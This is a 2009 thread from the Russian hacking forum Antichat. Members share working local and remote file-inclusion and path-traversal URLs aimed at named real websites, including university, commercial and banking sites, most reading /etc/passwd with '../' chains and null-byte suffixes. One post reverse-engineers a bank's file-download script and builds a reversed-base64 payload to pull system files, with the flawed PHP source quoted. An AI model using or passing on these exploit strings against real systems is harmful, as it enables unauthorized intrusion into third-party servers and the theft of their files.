Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
24.07.2009, 12:04
|
|
Новичок
Регистрация: 21.09.2008
Сообщений: 4
Провел на форуме:
19277
Репутация:
3
|
|
Директория
http://doska42.ru/index.php?rub=news&page=../../../../../../../etc/
Файл в ней
http://doska42.ru/index.php?rub=newspod&rubnews=../../../../../../../../../..&page=FILENAME
|
|
|
28.07.2009, 23:07
|
|
Постоянный
Регистрация: 11.03.2008
Сообщений: 347
Провел на форуме:
2075230
Репутация:
462
|
|
Банка,
multibanka.com
Берёт файл, например:
Код:
http://www.multibanka.com/get_file.php?ext=pdf&q=c3VyL25vaXRhY2lscHBhL3N0bmVtdWNvZC9zZWxpZl9kZWRhb2xwdT1odGFwX2VsaWY7ZmRwLnVyXzcwMDJfc3Rza2FyYXNfdXRzbGF2XzI9ZW1hbl9lbGlm
Base64!
Декодируем:
Код:
sur/noitacilppa/stnemucod/selif_dedaolpu=htap_elif;fdp.ur_7002_stskaras_utslav_2=eman_elif
^_^
Код:
file_name=2_valstu_saraksts_2007_ru.pdf;file_path= rus/application/documents/selif_dedaopu
Делаем по умному /etc/passwd
Код:
/cte/=htap_elif;dwssap=eman_elif
И берём его 
Код:
http://www.multibanka.com/get_file.php?ext=pdf&q=L2N0ZS89aHRhcF9lbGlmO2R3c3NhcD1lbWFuX2VsaWY=
такая вот шн*га.
P.S:
get_file.php
PHP код:
include "include_php/my_encoder.php";
decode_str( $_GET['q'] );
$file_type = explode('.',$_GET['file_name']);
$file_type = end($file_type);
if(strtolower($file_type)=='pdf')
header('Content-type: application/pdf');
//print_r($_GET);
header("Content-Description: File Transfer");
header("Content-Disposition: attachment; filename=". $_GET['file_name']);
header("Content-Transfer-Encoding: binary");
header("Content-Type: application/download");
header("Accept-Ranges: bytes");
header("Content-Length: ". filesize($_GET['file_path']."/".$_GET['file_name']));
$file = $_GET['file_path']."/".$_GET['file_name'];
$filename = fopen($file,"r");
$data = fread($filename, filesize($file));
fclose($filename);
echo $data;
my_encoder.php
PHP код:
function encode_str($string) {
return base64_encode(strrev($string));
}
function decode_str($string) {
$result = strrev(base64_decode($string));
// SQL injection tests
if ((eregi("SELECT", $s)) || (eregi("select", $result)) || (eregi("UNION", $result)) || (eregi("union", $result))) {
Header("Location: http://www.bs.lv/track_hacker.php");
}
$tmp_arr=split(";",$result);
for ( $i=0; $i<=sizeof($tmp_arr); $i++ ) {
$ta = split("=",$tmp_arr[$i]);
if ($ta['0']) {
$_GET[$ta['0']] = $ta['1'];
}
}
}
|
|
|
|
29.07.2009, 14:04
|
|
Постоянный
Регистрация: 11.03.2008
Сообщений: 347
Провел на форуме:
2075230
Репутация:
462
|
|
http://www.lastminute-music.com/index.php?inc=/etc/passwd
http://www.pubs.org.au/index.php?inc=/etc/passwd
|
|
|
|
03.08.2009, 12:32
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534
Репутация:
2731
|
|
тИЦ: 50
PR: 4
RFI
Код:
http://www.bloodfmba.ru/news/mir.php?id=RFI
Последний раз редактировалось jokester; 03.08.2009 в 13:21..
Причина: Правила!!!!
|
|
|
|
05.08.2009, 17:29
|
|
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
Провел на форуме:
5011696
Репутация:
2221
|
|
http://www.centerforloss.com/articles.php?file=
Локальный инклюд.
До /etc/passwd несмог пробраться, на хостинге фильтр.
http://www.matchmaking.at/athen2008/index.php?file=
локальный инклюд.
что то ненашёл /etc/passwd
http://www.westbalkanresearch.net/index.php?file=
Такая же беда 
Последний раз редактировалось Ctacok; 05.08.2009 в 17:37..
|
|
|
|
06.08.2009, 09:51
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534
Репутация:
2731
|
|
PR4
LFI
Код:
http://www.akademiaurody.com/index.php?id=[LFI]
|
|
|
|
07.08.2009, 12:57
|
|
Постоянный
Регистрация: 03.06.2009
Сообщений: 385
Провел на форуме:
3178262
Репутация:
389
|
|
LFI
тИЦ 240
PR 5/10
Код:
http://www.tnpu.edu.ua/php1/index.php?page=../../../../../../etc/passwd
|
|
|
|
07.08.2009, 15:00
|
|
Постоянный
Регистрация: 03.06.2009
Сообщений: 385
Провел на форуме:
3178262
Репутация:
389
|
|
На форуме нашёл тока sql-inj к сайту, поэтому выложу php-inj
LFI
Код:
http://www.uvm.edu/student_life/?Page=../phpinfo.php
|
|
|
|
07.08.2009, 16:27
|
|
Moderator - Level 7
Регистрация: 06.02.2009
Сообщений: 195
Провел на форуме:
2485155
Репутация:
719
|
|
ну и от меня кусочек
Код HTML:
http://www.lauralee.com/index.cgi?page=../../../../../../../etc/passwd%00
Код HTML:
http://www.cats-online.ru/index.cgi?state=article_phsycology&page=../../../../../../../etc/passwd%00
Код HTML:
http://www.phathack.com/index.cgi?page=../../../../../../../../../../../../../../etc/passwd%00
Код HTML:
http://www.concordalliance.org/index.cgi?page=../../../../../../../../../../../../../../../../../../etc/passwd%00
Последний раз редактировалось satana-fu; 07.08.2009 в 17:09..
|
|
|
|
08.08.2009, 02:17
|
|
Участник форума
Регистрация: 28.12.2008
Сообщений: 136
Провел на форуме:
1311435
Репутация:
90
|
|
http://www.menlo.edu/library/courses/courses.php?course=../../../../../../etc/passwd
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
